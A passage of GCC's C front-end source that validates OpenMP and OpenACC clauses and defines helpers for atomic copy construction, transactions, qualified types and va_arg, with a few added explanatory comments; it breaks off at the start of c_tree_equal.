else if (TYPE_ATOMIC (TREE_TYPE (t)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%<_Atomic%> %qD in %<aligned%> clause", t);
remove = true;
break;
}
else if (bitmap_bit_p (&aligned_head, DECL_UID (t)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE appears more than once in %<aligned%> clauses",
t);
remove = true;
}
else
bitmap_set_bit (&aligned_head, DECL_UID (t));
break;
case OMP_CLAUSE_NONTEMPORAL:
t = OMP_CLAUSE_DECL (c);
if (!VAR_P (t) && TREE_CODE (t) != PARM_DECL)
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE is not a variable in %<nontemporal%> clause", t);
remove = true;
}
else if (bitmap_bit_p (&oacc_reduction_head, DECL_UID (t)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE appears more than once in %<nontemporal%> "
"clauses", t);
remove = true;
}
else
bitmap_set_bit (&oacc_reduction_head, DECL_UID (t));
break;
case OMP_CLAUSE_DEPEND:
t = OMP_CLAUSE_DECL (c);
if (t == NULL_TREE)
{
gcc_assert (OMP_CLAUSE_DEPEND_KIND (c)
== OMP_CLAUSE_DEPEND_SOURCE);
break;
}
if (OMP_CLAUSE_DEPEND_KIND (c) == OMP_CLAUSE_DEPEND_SINK)
{
gcc_assert (TREE_CODE (t) == TREE_LIST);
for (; t; t = TREE_CHAIN (t))
{
tree decl = TREE_VALUE (t);
if (TREE_CODE (TREE_TYPE (decl)) == POINTER_TYPE)
{
tree offset = TREE_PURPOSE (t);
bool neg = wi::neg_p (wi::to_wide (offset));
offset = fold_unary (ABS_EXPR, TREE_TYPE (offset), offset);
tree t2 = pointer_int_sum (OMP_CLAUSE_LOCATION (c),
neg ? MINUS_EXPR : PLUS_EXPR,
decl, offset);
t2 = fold_build2_loc (OMP_CLAUSE_LOCATION (c), MINUS_EXPR,
sizetype,
fold_convert (sizetype, t2),
fold_convert (sizetype, decl));
if (t2 == error_mark_node)
{
remove = true;
break;
}
TREE_PURPOSE (t) = t2;
}
}
break;
}
if (TREE_CODE (t) == TREE_LIST
&& TREE_PURPOSE (t)
&& TREE_CODE (TREE_PURPOSE (t)) == TREE_VEC)
{
if (TREE_PURPOSE (t) != last_iterators)
last_iterators_remove
= c_omp_finish_iterators (TREE_PURPOSE (t));
last_iterators = TREE_PURPOSE (t);
t = TREE_VALUE (t);
if (last_iterators_remove)
t = error_mark_node;
}
else
last_iterators = NULL_TREE;
if (TREE_CODE (t) == TREE_LIST)
{
if (handle_omp_array_sections (c, ort))
remove = true;
else if (OMP_CLAUSE_DEPEND_KIND (c) == OMP_CLAUSE_DEPEND_DEPOBJ)
{
error_at (OMP_CLAUSE_LOCATION (c),
"%<depend%> clause with %<depobj%> dependence "
"type on array section");
remove = true;
}
break;
}
if (t == error_mark_node)
remove = true;
else if (!lvalue_p (t))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE is not lvalue expression nor array section in "
"%<depend%> clause", t);
remove = true;
}
else if (TREE_CODE (t) == COMPONENT_REF
&& DECL_C_BIT_FIELD (TREE_OPERAND (t, 1)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"bit-field %qE in %qs clause", t, "depend");
remove = true;
}
else if (OMP_CLAUSE_DEPEND_KIND (c) == OMP_CLAUSE_DEPEND_DEPOBJ)
{
if (!c_omp_depend_t_p (TREE_TYPE (t)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE does not have %<omp_depend_t%> type in "
"%<depend%> clause with %<depobj%> dependence "
"type", t);
remove = true;
}
}
else if (c_omp_depend_t_p (TREE_TYPE (t)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE should not have %<omp_depend_t%> type in "
"%<depend%> clause with dependence type other than "
"%<depobj%>", t);
remove = true;
}
if (!remove)
{
tree addr = build_unary_op (OMP_CLAUSE_LOCATION (c), ADDR_EXPR,
t, false);
if (addr == error_mark_node)
remove = true;
else
{
t = build_indirect_ref (OMP_CLAUSE_LOCATION (c), addr,
RO_UNARY_STAR);
if (t == error_mark_node)
remove = true;
else if (TREE_CODE (OMP_CLAUSE_DECL (c)) == TREE_LIST
&& TREE_PURPOSE (OMP_CLAUSE_DECL (c))
&& (TREE_CODE (TREE_PURPOSE (OMP_CLAUSE_DECL (c)))
== TREE_VEC))
TREE_VALUE (OMP_CLAUSE_DECL (c)) = t;
else
OMP_CLAUSE_DECL (c) = t;
}
}
break;
case OMP_CLAUSE_MAP:
case OMP_CLAUSE_TO:
case OMP_CLAUSE_FROM:
case OMP_CLAUSE__CACHE_:
t = OMP_CLAUSE_DECL (c);
if (TREE_CODE (t) == TREE_LIST)
{
if (handle_omp_array_sections (c, ort))
remove = true;
else
{
t = OMP_CLAUSE_DECL (c);
if (!lang_hooks.types.omp_mappable_type (TREE_TYPE (t)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"array section does not have mappable type "
"in %qs clause",
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
remove = true;
}
else if (TYPE_ATOMIC (TREE_TYPE (t)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%<_Atomic%> %qE in %qs clause", t,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
remove = true;
}
while (TREE_CODE (t) == ARRAY_REF)
t = TREE_OPERAND (t, 0);
if (TREE_CODE (t) == COMPONENT_REF
&& TREE_CODE (TREE_TYPE (t)) == ARRAY_TYPE)
{
while (TREE_CODE (t) == COMPONENT_REF)
t = TREE_OPERAND (t, 0);
if (bitmap_bit_p (&map_field_head, DECL_UID (t)))
break;
if (bitmap_bit_p (&map_head, DECL_UID (t)))
{
if (OMP_CLAUSE_CODE (c) != OMP_CLAUSE_MAP)
error_at (OMP_CLAUSE_LOCATION (c),
"%qD appears more than once in motion "
"clauses", t);
else if (ort == C_ORT_ACC)
error_at (OMP_CLAUSE_LOCATION (c),
"%qD appears more than once in data "
"clauses", t);
else
error_at (OMP_CLAUSE_LOCATION (c),
"%qD appears more than once in map "
"clauses", t);
remove = true;
}
else
{
bitmap_set_bit (&map_head, DECL_UID (t));
bitmap_set_bit (&map_field_head, DECL_UID (t));
}
}
}
if (c_oacc_check_attachments (c))
remove = true;
if (OMP_CLAUSE_CODE (c) == OMP_CLAUSE_MAP
&& (OMP_CLAUSE_MAP_KIND (c) == GOMP_MAP_ATTACH
|| OMP_CLAUSE_MAP_KIND (c) == GOMP_MAP_DETACH))
/* In this case, we have a single array element which is a
pointer, and we already set OMP_CLAUSE_SIZE in
handle_omp_array_sections above. For attach/detach clauses,
reset the OMP_CLAUSE_SIZE (representing a bias) to zero
here. */
OMP_CLAUSE_SIZE (c) = size_zero_node;
break;
}
if (t == error_mark_node)
{
remove = true;
break;
}
/* OpenACC attach / detach clauses must be pointers. */
if (c_oacc_check_attachments (c))
{
remove = true;
break;
}
if (OMP_CLAUSE_CODE (c) == OMP_CLAUSE_MAP
&& (OMP_CLAUSE_MAP_KIND (c) == GOMP_MAP_ATTACH
|| OMP_CLAUSE_MAP_KIND (c) == GOMP_MAP_DETACH))
/* For attach/detach clauses, set OMP_CLAUSE_SIZE (representing a
bias) to zero here, so it is not set erroneously to the pointer
size later on in gimplify.c. */
OMP_CLAUSE_SIZE (c) = size_zero_node;
if (TREE_CODE (t) == COMPONENT_REF
&& OMP_CLAUSE_CODE (c) != OMP_CLAUSE__CACHE_)
{
if (DECL_BIT_FIELD (TREE_OPERAND (t, 1)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"bit-field %qE in %qs clause",
t, omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
remove = true;
}
else if (!lang_hooks.types.omp_mappable_type (TREE_TYPE (t)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE does not have a mappable type in %qs clause",
t, omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
remove = true;
}
else if (TYPE_ATOMIC (TREE_TYPE (t)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%<_Atomic%> %qE in %qs clause", t,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
remove = true;
}
while (TREE_CODE (t) == COMPONENT_REF)
{
if (TREE_CODE (TREE_TYPE (TREE_OPERAND (t, 0)))
== UNION_TYPE)
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE is a member of a union", t);
remove = true;
break;
}
t = TREE_OPERAND (t, 0);
if (ort == C_ORT_ACC && TREE_CODE (t) == MEM_REF)
{
if (maybe_ne (mem_ref_offset (t), 0))
error_at (OMP_CLAUSE_LOCATION (c),
"cannot dereference %qE in %qs clause", t,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
else
t = TREE_OPERAND (t, 0);
}
}
if (remove)
break;
if (VAR_P (t) || TREE_CODE (t) == PARM_DECL)
{
if (bitmap_bit_p (&map_field_head, DECL_UID (t)))
break;
}
}
if (!VAR_P (t) && TREE_CODE (t) != PARM_DECL)
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE is not a variable in %qs clause", t,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
remove = true;
}
else if (VAR_P (t) && DECL_THREAD_LOCAL_P (t))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qD is threadprivate variable in %qs clause", t,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
remove = true;
}
else if ((OMP_CLAUSE_CODE (c) != OMP_CLAUSE_MAP
|| (OMP_CLAUSE_MAP_KIND (c)
!= GOMP_MAP_FIRSTPRIVATE_POINTER))
&& !c_mark_addressable (t))
remove = true;
else if (!(OMP_CLAUSE_CODE (c) == OMP_CLAUSE_MAP
&& (OMP_CLAUSE_MAP_KIND (c) == GOMP_MAP_POINTER
|| (OMP_CLAUSE_MAP_KIND (c)
== GOMP_MAP_FIRSTPRIVATE_POINTER)
|| (OMP_CLAUSE_MAP_KIND (c)
== GOMP_MAP_FORCE_DEVICEPTR)))
&& t == OMP_CLAUSE_DECL (c)
&& !lang_hooks.types.omp_mappable_type (TREE_TYPE (t)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qD does not have a mappable type in %qs clause", t,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
remove = true;
}
else if (TREE_TYPE (t) == error_mark_node)
remove = true;
else if (TYPE_ATOMIC (strip_array_types (TREE_TYPE (t))))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%<_Atomic%> %qE in %qs clause", t,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
remove = true;
}
else if (OMP_CLAUSE_CODE (c) == OMP_CLAUSE_MAP
&& OMP_CLAUSE_MAP_KIND (c) == GOMP_MAP_FIRSTPRIVATE_POINTER)
{
if (bitmap_bit_p (&generic_head, DECL_UID (t))
|| bitmap_bit_p (&firstprivate_head, DECL_UID (t)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qD appears more than once in data clauses", t);
remove = true;
}
else if (bitmap_bit_p (&map_head, DECL_UID (t)))
{
if (ort == C_ORT_ACC)
error_at (OMP_CLAUSE_LOCATION (c),
"%qD appears more than once in data clauses", t);
else
error_at (OMP_CLAUSE_LOCATION (c),
"%qD appears both in data and map clauses", t);
remove = true;
}
else
bitmap_set_bit (&generic_head, DECL_UID (t));
}
else if (bitmap_bit_p (&map_head, DECL_UID (t)))
{
if (OMP_CLAUSE_CODE (c) != OMP_CLAUSE_MAP)
error_at (OMP_CLAUSE_LOCATION (c),
"%qD appears more than once in motion clauses", t);
else if (ort == C_ORT_ACC)
error_at (OMP_CLAUSE_LOCATION (c),
"%qD appears more than once in data clauses", t);
else
error_at (OMP_CLAUSE_LOCATION (c),
"%qD appears more than once in map clauses", t);
remove = true;
}
else if (bitmap_bit_p (&generic_head, DECL_UID (t))
|| bitmap_bit_p (&firstprivate_head, DECL_UID (t)))
{
if (ort == C_ORT_ACC)
error_at (OMP_CLAUSE_LOCATION (c),
"%qD appears more than once in data clauses", t);
else
error_at (OMP_CLAUSE_LOCATION (c),
"%qD appears both in data and map clauses", t);
remove = true;
}
else
{
bitmap_set_bit (&map_head, DECL_UID (t));
if (t != OMP_CLAUSE_DECL (c)
&& TREE_CODE (OMP_CLAUSE_DECL (c)) == COMPONENT_REF)
bitmap_set_bit (&map_field_head, DECL_UID (t));
}
break;
case OMP_CLAUSE_TO_DECLARE:
case OMP_CLAUSE_LINK:
t = OMP_CLAUSE_DECL (c);
if (TREE_CODE (t) == FUNCTION_DECL
&& OMP_CLAUSE_CODE (c) == OMP_CLAUSE_TO_DECLARE)
;
else if (!VAR_P (t))
{
if (OMP_CLAUSE_CODE (c) == OMP_CLAUSE_TO_DECLARE)
error_at (OMP_CLAUSE_LOCATION (c),
"%qE is neither a variable nor a function name in "
"clause %qs", t,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
else
error_at (OMP_CLAUSE_LOCATION (c),
"%qE is not a variable in clause %qs", t,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
remove = true;
}
else if (DECL_THREAD_LOCAL_P (t))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qD is threadprivate variable in %qs clause", t,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
remove = true;
}
else if (!lang_hooks.types.omp_mappable_type (TREE_TYPE (t)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qD does not have a mappable type in %qs clause", t,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
remove = true;
}
if (remove)
break;
if (bitmap_bit_p (&generic_head, DECL_UID (t)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE appears more than once on the same "
"%<declare target%> directive", t);
remove = true;
}
else
bitmap_set_bit (&generic_head, DECL_UID (t));
break;
case OMP_CLAUSE_UNIFORM:
t = OMP_CLAUSE_DECL (c);
if (TREE_CODE (t) != PARM_DECL)
{
if (DECL_P (t))
error_at (OMP_CLAUSE_LOCATION (c),
"%qD is not an argument in %<uniform%> clause", t);
else
error_at (OMP_CLAUSE_LOCATION (c),
"%qE is not an argument in %<uniform%> clause", t);
remove = true;
break;
}
/* map_head bitmap is used as uniform_head if declare_simd. */
bitmap_set_bit (&map_head, DECL_UID (t));
goto check_dup_generic;
case OMP_CLAUSE_IS_DEVICE_PTR:
case OMP_CLAUSE_USE_DEVICE_PTR:
t = OMP_CLAUSE_DECL (c);
if (TREE_CODE (TREE_TYPE (t)) != POINTER_TYPE)
{
if (OMP_CLAUSE_CODE (c) == OMP_CLAUSE_USE_DEVICE_PTR
&& ort == C_ORT_OMP)
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qs variable is not a pointer",
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
remove = true;
}
else if (TREE_CODE (TREE_TYPE (t)) != ARRAY_TYPE)
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qs variable is neither a pointer nor an array",
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
remove = true;
}
}
goto check_dup_generic;
case OMP_CLAUSE_USE_DEVICE_ADDR:
t = OMP_CLAUSE_DECL (c);
if (VAR_P (t) || TREE_CODE (t) == PARM_DECL)
c_mark_addressable (t);
goto check_dup_generic;
case OMP_CLAUSE_NOWAIT:
if (copyprivate_seen)
{
error_at (OMP_CLAUSE_LOCATION (c),
"%<nowait%> clause must not be used together "
"with %<copyprivate%>");
remove = true;
break;
}
nowait_clause = pc;
pc = &OMP_CLAUSE_CHAIN (c);
continue;
case OMP_CLAUSE_ORDER:
if (ordered_clause)
{
error_at (OMP_CLAUSE_LOCATION (c),
"%<order%> clause must not be used together "
"with %<ordered%>");
remove = true;
break;
}
else if (order_clause)
{
/* Silently remove duplicates. */
remove = true;
break;
}
order_clause = pc;
pc = &OMP_CLAUSE_CHAIN (c);
continue;
case OMP_CLAUSE_IF:
case OMP_CLAUSE_NUM_THREADS:
case OMP_CLAUSE_NUM_TEAMS:
case OMP_CLAUSE_THREAD_LIMIT:
case OMP_CLAUSE_DEFAULT:
case OMP_CLAUSE_UNTIED:
case OMP_CLAUSE_COLLAPSE:
case OMP_CLAUSE_FINAL:
case OMP_CLAUSE_MERGEABLE:
case OMP_CLAUSE_DEVICE:
case OMP_CLAUSE_DIST_SCHEDULE:
case OMP_CLAUSE_PARALLEL:
case OMP_CLAUSE_FOR:
case OMP_CLAUSE_SECTIONS:
case OMP_CLAUSE_TASKGROUP:
case OMP_CLAUSE_PROC_BIND:
case OMP_CLAUSE_DEVICE_TYPE:
case OMP_CLAUSE_PRIORITY:
case OMP_CLAUSE_GRAINSIZE:
case OMP_CLAUSE_NUM_TASKS:
case OMP_CLAUSE_THREADS:
case OMP_CLAUSE_SIMD:
case OMP_CLAUSE_HINT:
case OMP_CLAUSE_DEFAULTMAP:
case OMP_CLAUSE_BIND:
case OMP_CLAUSE_NUM_GANGS:
case OMP_CLAUSE_NUM_WORKERS:
case OMP_CLAUSE_VECTOR_LENGTH:
case OMP_CLAUSE_ASYNC:
case OMP_CLAUSE_WAIT:
case OMP_CLAUSE_AUTO:
case OMP_CLAUSE_INDEPENDENT:
case OMP_CLAUSE_SEQ:
case OMP_CLAUSE_GANG:
case OMP_CLAUSE_WORKER:
case OMP_CLAUSE_VECTOR:
case OMP_CLAUSE_TILE:
case OMP_CLAUSE_IF_PRESENT:
case OMP_CLAUSE_FINALIZE:
pc = &OMP_CLAUSE_CHAIN (c);
continue;
case OMP_CLAUSE_NOGROUP:
nogroup_seen = pc;
pc = &OMP_CLAUSE_CHAIN (c);
continue;
case OMP_CLAUSE_SCHEDULE:
schedule_clause = c;
pc = &OMP_CLAUSE_CHAIN (c);
continue;
case OMP_CLAUSE_ORDERED:
ordered_clause = c;
if (order_clause)
{
error_at (OMP_CLAUSE_LOCATION (*order_clause),
"%<order%> clause must not be used together "
"with %<ordered%>");
*order_clause = OMP_CLAUSE_CHAIN (*order_clause);
order_clause = NULL;
}
pc = &OMP_CLAUSE_CHAIN (c);
continue;
case OMP_CLAUSE_SAFELEN:
safelen = c;
pc = &OMP_CLAUSE_CHAIN (c);
continue;
case OMP_CLAUSE_SIMDLEN:
simdlen = c;
pc = &OMP_CLAUSE_CHAIN (c);
continue;
case OMP_CLAUSE_INBRANCH:
case OMP_CLAUSE_NOTINBRANCH:
if (branch_seen)
{
error_at (OMP_CLAUSE_LOCATION (c),
"%<inbranch%> clause is incompatible with "
"%<notinbranch%>");
remove = true;
break;
}
branch_seen = true;
pc = &OMP_CLAUSE_CHAIN (c);
continue;
case OMP_CLAUSE_INCLUSIVE:
case OMP_CLAUSE_EXCLUSIVE:
need_complete = true;
need_implicitly_determined = true;
t = OMP_CLAUSE_DECL (c);
if (!VAR_P (t) && TREE_CODE (t) != PARM_DECL)
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE is not a variable in clause %qs", t,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
remove = true;
}
break;
default:
gcc_unreachable ();
}
if (!remove)
{
t = OMP_CLAUSE_DECL (c);
if (need_complete)
{
t = require_complete_type (OMP_CLAUSE_LOCATION (c), t);
if (t == error_mark_node)
remove = true;
}
if (need_implicitly_determined)
{
const char *share_name = NULL;
if (VAR_P (t) && DECL_THREAD_LOCAL_P (t))
share_name = "threadprivate";
else switch (c_omp_predetermined_sharing (t))
{
case OMP_CLAUSE_DEFAULT_UNSPECIFIED:
break;
case OMP_CLAUSE_DEFAULT_SHARED:
if ((OMP_CLAUSE_CODE (c) == OMP_CLAUSE_SHARED
|| OMP_CLAUSE_CODE (c) == OMP_CLAUSE_FIRSTPRIVATE)
&& c_omp_predefined_variable (t))
/* The __func__ variable and similar function-local
predefined variables may be listed in a shared or
firstprivate clause. */
break;
share_name = "shared";
break;
case OMP_CLAUSE_DEFAULT_PRIVATE:
share_name = "private";
break;
default:
gcc_unreachable ();
}
if (share_name)
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE is predetermined %qs for %qs",
t, share_name,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
remove = true;
}
else if (TREE_READONLY (t)
&& OMP_CLAUSE_CODE (c) != OMP_CLAUSE_SHARED
&& OMP_CLAUSE_CODE (c) != OMP_CLAUSE_FIRSTPRIVATE)
{
error_at (OMP_CLAUSE_LOCATION (c),
"%<const%> qualified %qE may appear only in "
"%<shared%> or %<firstprivate%> clauses", t);
remove = true;
}
}
}
if (remove)
*pc = OMP_CLAUSE_CHAIN (c);
else
pc = &OMP_CLAUSE_CHAIN (c);
}
if (simdlen
&& safelen
&& tree_int_cst_lt (OMP_CLAUSE_SAFELEN_EXPR (safelen),
OMP_CLAUSE_SIMDLEN_EXPR (simdlen)))
{
error_at (OMP_CLAUSE_LOCATION (simdlen),
"%<simdlen%> clause value is bigger than "
"%<safelen%> clause value");
OMP_CLAUSE_SIMDLEN_EXPR (simdlen)
= OMP_CLAUSE_SAFELEN_EXPR (safelen);
}
if (ordered_clause
&& schedule_clause
&& (OMP_CLAUSE_SCHEDULE_KIND (schedule_clause)
& OMP_CLAUSE_SCHEDULE_NONMONOTONIC))
{
error_at (OMP_CLAUSE_LOCATION (schedule_clause),
"%<nonmonotonic%> schedule modifier specified together "
"with %<ordered%> clause");
OMP_CLAUSE_SCHEDULE_KIND (schedule_clause)
= (enum omp_clause_schedule_kind)
(OMP_CLAUSE_SCHEDULE_KIND (schedule_clause)
& ~OMP_CLAUSE_SCHEDULE_NONMONOTONIC);
}
if (reduction_seen < 0 && ordered_clause)
{
error_at (OMP_CLAUSE_LOCATION (ordered_clause),
"%qs clause specified together with %<inscan%> "
"%<reduction%> clause", "ordered");
reduction_seen = -2;
}
if (reduction_seen < 0 && schedule_clause)
{
error_at (OMP_CLAUSE_LOCATION (schedule_clause),
"%qs clause specified together with %<inscan%> "
"%<reduction%> clause", "schedule");
reduction_seen = -2;
}
if (linear_variable_step_check || reduction_seen == -2)
for (pc = &clauses, c = clauses; c ; c = *pc)
{
bool remove = false;
if (OMP_CLAUSE_CODE (c) == OMP_CLAUSE_LINEAR
&& OMP_CLAUSE_LINEAR_VARIABLE_STRIDE (c)
&& !bitmap_bit_p (&map_head,
DECL_UID (OMP_CLAUSE_LINEAR_STEP (c))))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%<linear%> clause step is a parameter %qD not "
"specified in %<uniform%> clause",
OMP_CLAUSE_LINEAR_STEP (c));
remove = true;
}
else if (OMP_CLAUSE_CODE (c) == OMP_CLAUSE_REDUCTION)
OMP_CLAUSE_REDUCTION_INSCAN (c) = 0;
if (remove)
*pc = OMP_CLAUSE_CHAIN (c);
else
pc = &OMP_CLAUSE_CHAIN (c);
}
if (nogroup_seen && reduction_seen)
{
error_at (OMP_CLAUSE_LOCATION (*nogroup_seen),
"%<nogroup%> clause must not be used together with "
"%<reduction%> clause");
*nogroup_seen = OMP_CLAUSE_CHAIN (*nogroup_seen);
}
bitmap_obstack_release (NULL);
return clauses;
}
/* Return code to initialize DST with a copy constructor from SRC.
C has neither copy constructors nor assignment operators; only for
_Atomic variables do we need to perform an __atomic_load from SRC into
a temporary, followed by an __atomic_store of the temporary into DST. */
tree
c_omp_clause_copy_ctor (tree clause, tree dst, tree src)
{
if (!really_atomic_lvalue (dst) && !really_atomic_lvalue (src))
return build2 (MODIFY_EXPR, TREE_TYPE (dst), dst, src);
location_t loc = OMP_CLAUSE_LOCATION (clause);
tree type = TREE_TYPE (dst);
tree nonatomic_type = build_qualified_type (type, TYPE_UNQUALIFIED);
tree tmp = create_tmp_var (nonatomic_type);
tree tmp_addr = build_fold_addr_expr (tmp);
TREE_ADDRESSABLE (tmp) = 1;
TREE_NO_WARNING (tmp) = 1;
tree src_addr = build_fold_addr_expr (src);
tree dst_addr = build_fold_addr_expr (dst);
tree seq_cst = build_int_cst (integer_type_node, MEMMODEL_SEQ_CST);
vec<tree, va_gc> *params;
/* Expansion of a generic atomic load may require an additional
element, so allocate enough to prevent a resize. */
vec_alloc (params, 4);
/* Build __atomic_load (&src, &tmp, SEQ_CST); */
tree fndecl = builtin_decl_explicit (BUILT_IN_ATOMIC_LOAD);
params->quick_push (src_addr);
params->quick_push (tmp_addr);
params->quick_push (seq_cst);
tree load = c_build_function_call_vec (loc, vNULL, fndecl, params, NULL);
vec_alloc (params, 4);
/* Build __atomic_store (&dst, &tmp, SEQ_CST); */
fndecl = builtin_decl_explicit (BUILT_IN_ATOMIC_STORE);
params->quick_push (dst_addr);
params->quick_push (tmp_addr);
params->quick_push (seq_cst);
tree store = c_build_function_call_vec (loc, vNULL, fndecl, params, NULL);
return build2 (COMPOUND_EXPR, void_type_node, load, store);
}
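/* Illustrative sketch (not part of the compiler source): for a clause
such as 'firstprivate (x)' where x is declared '_Atomic int', the tree
built above corresponds roughly to the following C:

int tmp;                                      // non-atomic temporary
__atomic_load (&src, &tmp, __ATOMIC_SEQ_CST); // load src into tmp
__atomic_store (&dst, &tmp, __ATOMIC_SEQ_CST);// store tmp into dst

i.e. a COMPOUND_EXPR of the generic atomic load and store, with the
temporary marked addressable because both builtins take its address. */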
/* Create a transaction node. */
tree
c_finish_transaction (location_t loc, tree block, int flags)
{
tree stmt = build_stmt (loc, TRANSACTION_EXPR, block);
if (flags & TM_STMT_ATTR_OUTER)
TRANSACTION_EXPR_OUTER (stmt) = 1;
if (flags & TM_STMT_ATTR_RELAXED)
TRANSACTION_EXPR_RELAXED (stmt) = 1;
return add_stmt (stmt);
}
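/* Illustrative sketch (an assumption based on GCC's -fgnu-tm source
syntax, not stated here): the FLAGS bits correspond to the transaction
statement forms, e.g.

__transaction_relaxed { x++; }            // sets TM_STMT_ATTR_RELAXED
__transaction_atomic [[outer]] { x++; }   // sets TM_STMT_ATTR_OUTER

each of which reaches this function as a TRANSACTION_EXPR wrapping
BLOCK. */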
/* Make a variant type in the proper way for C/C++, propagating qualifiers
down to the element type of an array. If ORIG_QUAL_TYPE is not
NULL, then it should be used as the qualified type
ORIG_QUAL_INDIRECT levels down in array type derivation (to
preserve information about the typedef name from which an array
type was derived). */
tree
c_build_qualified_type (tree type, int type_quals, tree orig_qual_type,
size_t orig_qual_indirect)
{
if (type == error_mark_node)
return type;
if (TREE_CODE (type) == ARRAY_TYPE)
{
tree t;
tree element_type = c_build_qualified_type (TREE_TYPE (type),
type_quals, orig_qual_type,
orig_qual_indirect - 1);
/* See if we already have an identically qualified type. */
if (orig_qual_type && orig_qual_indirect == 0)
t = orig_qual_type;
else
for (t = TYPE_MAIN_VARIANT (type); t; t = TYPE_NEXT_VARIANT (t))
{
if (TYPE_QUALS (strip_array_types (t)) == type_quals
&& TYPE_NAME (t) == TYPE_NAME (type)
&& TYPE_CONTEXT (t) == TYPE_CONTEXT (type)
&& attribute_list_equal (TYPE_ATTRIBUTES (t),
TYPE_ATTRIBUTES (type)))
break;
}
if (!t)
{
tree domain = TYPE_DOMAIN (type);
t = build_variant_type_copy (type);
TREE_TYPE (t) = element_type;
if (TYPE_STRUCTURAL_EQUALITY_P (element_type)
|| (domain && TYPE_STRUCTURAL_EQUALITY_P (domain)))
SET_TYPE_STRUCTURAL_EQUALITY (t);
else if (TYPE_CANONICAL (element_type) != element_type
|| (domain && TYPE_CANONICAL (domain) != domain))
{
tree unqualified_canon
= build_array_type (TYPE_CANONICAL (element_type),
domain? TYPE_CANONICAL (domain)
: NULL_TREE);
if (TYPE_REVERSE_STORAGE_ORDER (type))
{
unqualified_canon
= build_distinct_type_copy (unqualified_canon);
TYPE_REVERSE_STORAGE_ORDER (unqualified_canon) = 1;
}
TYPE_CANONICAL (t)
= c_build_qualified_type (unqualified_canon, type_quals);
}
else
TYPE_CANONICAL (t) = t;
}
return t;
}
/* A restrict-qualified pointer type must be a pointer to object or
incomplete type. Note that the use of POINTER_TYPE_P also allows
REFERENCE_TYPEs, which is appropriate for C++. */
if ((type_quals & TYPE_QUAL_RESTRICT)
&& (!POINTER_TYPE_P (type)
|| !C_TYPE_OBJECT_OR_INCOMPLETE_P (TREE_TYPE (type))))
{
error ("invalid use of %<restrict%>");
type_quals &= ~TYPE_QUAL_RESTRICT;
}
tree var_type = (orig_qual_type && orig_qual_indirect == 0
? orig_qual_type
: build_qualified_type (type, type_quals));
/* A variant type does not inherit the list of incomplete vars from the
type main variant. */
if ((RECORD_OR_UNION_TYPE_P (var_type)
|| TREE_CODE (var_type) == ENUMERAL_TYPE)
&& TYPE_MAIN_VARIANT (var_type) != var_type)
C_TYPE_INCOMPLETE_VARS (var_type) = 0;
return var_type;
}
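/* Illustrative sketch (not part of the compiler source): qualifiers
applied to an array type are pushed down to the element type, so

typedef int A[5];
const A x;   // type of x is an array of 5 'const int' elements

and TYPE_QUALS (strip_array_types (TREE_TYPE (x))) reports the const
qualifier, matching the recursion on TREE_TYPE (type) above. */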
/* Build a VA_ARG_EXPR for the C parser. */
tree
c_build_va_arg (location_t loc1, tree expr, location_t loc2, tree type)
{
if (error_operand_p (type))
return error_mark_node;
/* VA_ARG_EXPR cannot be used for a scalar va_list with reverse storage
order because it takes the address of the expression. */
else if (handled_component_p (expr)
&& reverse_storage_order_for_component_p (expr))
{
error_at (loc1, "cannot use %<va_arg%> with reverse storage order");
return error_mark_node;
}
else if (!COMPLETE_TYPE_P (type))
{
error_at (loc2, "second argument to %<va_arg%> is of incomplete "
"type %qT", type);
return error_mark_node;
}
else if (warn_cxx_compat && TREE_CODE (type) == ENUMERAL_TYPE)
warning_at (loc2, OPT_Wc___compat,
"C++ requires promoted type, not enum type, in %<va_arg%>");
return build_va_arg (loc2, expr, type);
}
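/* Illustrative sketch (not part of the compiler source): the checks
above reject or warn about uses such as

struct S;                 // incomplete type
va_arg (ap, struct S);    // error: second argument is incomplete

enum E { A, B };
va_arg (ap, enum E);      // -Wc++-compat warns: C++ requires the
                          // promoted type (int), not the enum type */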
/* Return truthvalue of whether T1 is the same tree structure as T2.
Return true if they are the same, false if they are different. */
bool
c_tree_equal (tree t1, tree t2)
{
enum tree_code code1, code2;
